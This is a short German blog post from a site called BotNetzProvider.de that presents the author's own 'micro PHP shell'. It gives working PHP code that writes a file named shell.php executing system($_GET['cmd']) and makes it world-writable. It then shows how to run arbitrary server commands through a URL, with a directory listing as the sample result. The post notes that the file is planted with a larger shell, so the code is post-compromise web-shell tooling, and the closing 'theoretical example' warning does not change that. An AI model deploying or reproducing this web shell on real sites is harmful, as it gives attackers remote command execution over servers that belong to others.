BotNetzProvider.de

Dies wird eine ganz neue Kategorie, über die ich gerne schreiben würde: “Micro PHP Shells”.

Allen sollten die “großen” PHP Shells wie: c99,r57, etc kennen. Doch was ich an diesen Shells nicht mag ist, dass die zu voll gepackt sind mit allem was man nicht wirklich braucht.

Ich möchte euch heute meine eigene kleine “micro PHP Shell” vorstellen.

<?php
$File = "shell.php";
$Handle = fopen($File, 'w');
$Data = '<?php system($_GET["cmd"]); ?>';
fwrite($Handle, $Data);
print "online";
fclose($Handle);
`chmod -R a+w $File`;
`chmod 777 $File`;
?>

Diese Shell ermöglicht es uns einen Datei mit dem Namen “shell.php” abzulegen. Da wir zuvor diese Datei mit einer macro Shell eingebunden haben () können wir die Shell nun wie folgt aufrufen:

www.deine-domain.info/pfad/shell.php?cmd?=$command

Nun können wir anstatt $command einfache Shell basierende Befehle aufrufen und diese werden direkt ausgeführt.

z.B.: www.deine-domain.info/pfad/shell.php?cmd?=ls

Nun bekommt man die Dateien in diesem Ordner angezeigt:

foo.php index.php shell.php

**** Warnung
Diese Shell sollte niemals ohne einen Schutz auf dem eigenen Webspace abgelegt werden, da jeder diese Befehle ausführen kann und es zu Datenverlust kommen kann. Dies ist nur ein theoretisches Beispiel für einen PHP-Shell.